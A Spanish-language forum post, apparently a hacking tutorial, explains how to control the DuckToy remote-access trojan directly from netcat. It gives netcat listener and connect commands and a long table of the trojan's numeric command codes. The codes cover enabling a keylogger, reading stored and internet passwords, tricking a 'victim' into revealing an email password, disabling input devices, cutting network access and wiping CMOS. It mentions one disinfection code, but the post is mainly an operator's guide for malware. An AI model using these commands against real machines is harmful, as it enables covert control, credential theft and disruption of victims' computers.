Autor
Hoy aprenderemos como poder controlar un troyano desde netcat por la parte del cliente o del servidor
Este fallo surge por parte del programador al no cerrar la conexion correctamente dejando que las conexiones se establezan aun si una parte del software no existe, y que nosotros aprovecharemos para leer con netcat
Bueno para que no se os haga tanto coñazo quizas, os pondre la miel en los labios, que os pareceria saberte parte de la estructura de un troyano famosisimo del cual no se ha publicado el codigo?, saber que paquetes lanza para cada cosa, saber como desinfectarte por terminal con una sola orden, ejecutar aplicaciones o lo que sea por netcat al usuario remoto
Haciendo de Servidor con netcat
1: Pondremos a netcat a la escucha de servidor:
nc -vvLp 1234 'pongo a netcat a la escucha y en reconexion por el puerto 1234 y que me de todos los datos de la conexion, en doble verbose
2: Nos conectaremos con el troyano ducktoy en este ejemplo,si no saben usar el ducktoy hay mucha info en google, tambien podeis coger otro troyano
, ya que el ducktoy informa de que si esta conectado si el servidor le manda continuamente un determinado paqueteAhora con la imagen, vereis mas claro el concepto de este tutorial, que es averiguar que paquetes se mandan entre servidor y cliente
Una vez hecho esto, la conexion esta realizada y podremos examinar los paquetes que se mandan, en este caso el ducktoy funciona con numeros
.Como observareis en la foto anterior, aparecio el numero 125 que sirve para informar que la conexion esta establecida3: Averiguando el numero de las funciones, para despues poder usarlas
Cada vez que des click a una determinada opcion del troyano, aparecera unos numeros mas, esos que hayan aparecido seran los que se usan para determinada opcion, por ej:
034: sirve para apagar windows como ven
Bueno, aqui os pondre otros ejemplos de los numero de las funciones:
Funciones del cliente Ducktoy:
Opciones del Server:
125: Iniciar conexion LO PRIMERO DE TODO081: Desinfectar Ordenador MUY IMPORTANTE SI ESTAS INFECTADO¡¡¡
080: Cerrar puertos de server
082: Restaurar Server
Informacion:
001: Buscar info de la victima
Boot:
033: Suspender windows
036: Reiniciar windows
035: Apagar windows forzado
037: Bloquear Windows
Portapapeles:
029: Leer portapapeles
030ola: Poner "ola" en el portapapeles, se puede modificar el "ola"
031: Borrar portapapeles
0321: Bloquear portapapeles
0320: Desbloquear portapapeles
Fecha/Hora:
01322:00 AM : Poner hora, las 22:00 estan de ejemplo
01411/11/1991: Poner la fecha 11/11/1991 en su fecha, esta se puede cambiar acordaros
015: Leer fecha y hora
Volumen:
141: Leer el nivel de volumen
141(0 a 65535): Por ejemplo, si quiero dejarle sin volumen escribira "1410", o si se lo quiero poner a tope "14165535"
142: Mostrar dialogo de volumen
1431: Reproducirle el sonido de inicio de windows
1432: Reproducirle el sonido de cierre de windows
Raton:
0161: Colocar los botones del raton al reves
0160: Colocar los botones normalmente
0171: Raton loco
0170: Raton normal
0181: Bloquear raton
0180: Desbloquear raton
130: Obtener posicion del raton
021932,(0 a 1000): Mover el raton segun la coordenada, por ej 021931,600 para moverla al medio aprox
Mensajes:
texto8titulo: En texto se pondria el texto del mensaje y en titulo, el titulo, por ej: ola8saludo
El ducktoy tiene soporte para iconos pero no e conseguido diferenciar como se distingue de cada uno, quizas el caracter no se represente en pantalla
Bromas1:
0021: Poner escritorio
0020: Quitar escritorio
0031: Poner Boton de inicio
0030: Quitar boton de inicio
0041: Poner barra de tareas
0040: Quitar barra de tareas
0051: Poner systray
0050: Quitar systray
0061: Poner reloj
0060: Quitar reloj
0421: Poner task rebar
0420: Quitar task rebar
0121: Abrir cd rom
0120: Cerrar cdrom
0081: Activar ctrl + alt + supr
0080: Desactivar ctrl + alt + supr
0091: Activar Scroll lock
0090: Desactivar Scroll lock
0101: Activar Caps lock
0100: Desactivar Caps lock
0111: Activar Num Lock
0110: Desactivar Num Lock
0071: Activar Monitor
0070: Desactivar Monitor
Bromas 2:
025: Desactivar teclado
026: Salvapantallas
027: Abrir menu de inicio
028: Deshabilitar salvapantallas
050: Quitar el fondo de pantalla
051: Minimizar todas las ventanas
099: Vaciar papelera
114mailvictima@hotmail.com: Esto es super rastrero, pedirle la contraseña a la victima de su mail u otro
115: Leer la contraseña
134: Leer nombre de pc
052nombre: Cambiar nombre de pc para el siguiente reinicio
Ping pong (dudo que por netcat puedas jugar jj pero weno):
1350: Abrirle el ping pong
138138: Cerrarle el ping pong
Resolucion:
072: Obtener resoluciones
Chat:
074(0-100): Abrirle un chat de % de tamaño, ej: abrir chat de toda la pantalla 074100
076tunick - mensaje: Una vez abierto el chat, mandar un mensaje con tu nick y el texto ejemplo, decirle que tal y mi nick es 50l3r; 07650l3r - que tal
075: Cerrarle el chat
Keylogger:
131texto: Enviarle un texto ej 131prueba
077110: habilitar keylogger
Impresora:
Bueno, esta se complica un poco, y va siendo asi el codigo
079texto 0 0 0 0 tamaño
texto: el texto que queramos imprimir
primer 0: Negrita
segundo 0: Cursiva
Tercer 0: Subrayado
cuarto 0: Tachado
tamaño: El tamaño de la fuente
ej de un texto impreso con negrita y crusiva en tamaño 12
079este es un texto impreso 1 1 0 0 12
Passwords:
085: Leer contraseñas
095: Contraseñas de internet
Pantalla:
117: Pantalla normal
112: Invertir colores
116: Dibujar en la pantalla
120: Invertir horizontalmente la pantalla
121: Voltear la pantalla hacia abajo
124: Subir la pantalla
119: Girar la pantalla hacia la izquierda
118: Girar la pantalla hacia la derecha
123: Llevar la pantalla a la izquierda
Iexplorer:
024http://www.SPAM(0): Abrir pagina web
024mailto: mi_mail@mail.com: Enviar mail
112http://www.el-hacer.net: Poner pagina de inicio
111: Ver la pagina de inicio actual
110: Cerrar ventanas de iexplorer
1030: Habilitar boton cerrar de iexplore
1031: Deshabilitar boton cerrar de iexplore
105: Habilitar/Deshabilitar boton de favoritos
107: Habilitar/Deshabilitar Opciones
109: Habilitar/Deshabilitar Descargar cosas
Conexiones de Red:
089: Ver conexiones de red
093: Desconectarle internet
094: Crear nueva conexion
Buscar Archivos:
Al igual que imprimir tiene varias opciones
0archivo.txt:\directorio
0-1: Buscar (1) o no buscar (0) en subdirectorios
archivo.txt: colocar el nombre y extension de archivo, se puede usar comodines
:\directorio:carpeta en la que se busca
CPU:
097: Borrar CMOS
0981: Habilitar beeps
0980: Deshabilitar beeps
Todas las anteriores funciones son las que incorpora el ducktoy a las cuales las agrega un numero para que haga determinada cosa, no e puesto algunas que no servirian ya que necesitarias interfaz grafica para visualizarlo
Ahora llega la hora de colocar a netcat como cliente, usar alguna funcion y ver la respuesta
Usando netcat como cliente y obtener info y realizar mandatos
1: Creamos el servidor local, con un puerto y ejecutamos el server, estara corriendo ahora por dicho puerto, una vez ejecutado conectamos el netcat a ese puerto de esta manera
nc 127.0.0.1 "puerto" ' en el puerto ponen el que colocaron en el server con el que os habeis infectado
2: No os saldra nada de nada, pues bien, como el cliente hizo con nosotros, ahora ejecutaremos el inicio de conexion escribiendo el numero de inicio que era 125
3: Somos unos genios, nos hemos conectado
, ahora podremos hacer lo que queramos con todo ese codigo, probemos por ejemplo a obtener info de la victima ejecutando el numero 001:
4: et voila, aqui esta toda la info de mi pc jejeje, por ultimo, cogeremos lo que tengo pegado en el portapapeles con el numero 029
La mayoria de los troyanos tienen este defecto, yo al mio se lo he dejado asi ya que como es de codigo libre me da igual pero para que veais una prueba de la conexion, ojo el mio es conexion inversa, quiere decir que el se conecta a mi no yo a el, entonces el cliente es el que escucha y el servidor el que se conecta:
Conectando con mi troyano:
Le doy la orden de que me de las unidades del sistema:
Ahora me pongo por parte del cliente y le creo un archivo:
Bueno como veran en mi "troyano" para crear un archivo tienes que escribir cuarenta mil caracteres ademas de que despues cada x segundos te manda el nick de la victima y los archivos del directorio principal, todo un "LOGRO" ¬¬ hhahaha
Os quiero recordad que es valido apra todo troyano, solo es necesario que lo intenteis
Nota: con el bifrost, en netcat no funciona, salen caracteres raros :C
Bueno hasta aqui ha llegado la teoria, ahora os toca a vosotros fardar de que manejais un troyano entero por terminal, ahi os lo dejo haha
saludos
En línea
) no dejaria la informacion 'tan' legible... quiero decir... que ademas de enviarla comprimida&&encriptada no seria legible porque como cadenas para el split no pondria saltos de linea y tal... asi que dar gracias al coder del DuckToy 
